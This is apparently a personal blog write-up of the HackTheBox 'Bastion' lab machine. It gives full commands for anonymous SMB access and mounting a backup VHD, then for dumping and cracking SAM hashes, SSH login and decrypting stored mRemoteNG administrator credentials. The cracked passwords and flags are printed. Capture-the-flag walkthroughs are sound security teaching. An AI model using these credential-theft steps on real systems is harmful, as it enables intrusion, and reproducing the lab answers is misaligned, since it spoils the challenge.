Security Advisor | jessefmoore on LinkedIn, X, and GitHub
jfm@kali:~/posts/2020-02-07$

HackTheBox — Bastion

2020-02-07  ·  HTB   Windows

Bastion machine info

Target: 10.10.10.134

Recon

nmap -sV -sC -oA nmap/Bastion 10.10.10.134
nmap output

SMB Enumeration

Scan for open SMB shares anonymously:

smbclient --list //bastion.htb/ -U ''
smb shares

Backups is the only accessible share. Connect and browse:

smbclient //10.10.10.134/Backups -U ''
backups share vhd files

VHD files found in the Backup directory.

Mount the VHD

Mount the SMB share locally, then use guestmount to mount the VHD:

# Mount the SMB share
mount -t cifs //10.10.10.134/Backups /mnt/smb

# Install guestfs tools if needed
apt install libguestfs-tools

# Mount the VHD
mkdir /mnt/vhd2
guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd2
guestmount

Browse the mounted VHD and navigate to the Windows System32/config directory:

find Desktop Documents/ Downloads/ -ls
files found

Extract SAM Hashes

Copy SAM and SYSTEM hives from the VHD:

cp SAM SYSTEM /root/htb/bastion
cd /root/htb/bastion
mkdir backup-dump
mv SAM SYSTEM backup-dump/
cd backup-dump/

impacket-secretsdump -sam SAM -system SYSTEM local
secretsdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

Administrator NT hash is blank (31d6c...) — account is disabled. Crack L4mpje's hash:

# CrackStation or hashcat
hashcat -m 1000 26112010952d963c8dc4217daec986d9 rockyou.txt
crackstation result

Result: bureaulampje

Foothold — SSH

ssh L4mpje@10.10.10.134
# password: bureaulampje
ssh shell 
type C:\Users\L4mpje\Desktop\user.txt

User flag: 9bfe57d5c3309db3a151772f9d86c6cd

Privesc — mRemoteNG Credential Extraction

JAWS enumeration reveals mRemoteNG installed — known to store credentials insecurely in confCons.xml.

jaws mremoteng 
# Download confCons.xml from target
scp l4mpje@10.10.10.134:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml .
confcons.xml

File contains encrypted Administrator RDP credentials. Use mremoteng-decrypt to crack them:

cat confCons.xml | grep Password
python mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
# Password: thXLHM96BeKL0ER2
decrypt result 
ssh administrator@10.10.10.134
# password: thXLHM96BeKL0ER2
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt

Root flag: 958850b91811676ed6620a9c430e65c8

root flag

← Back to posts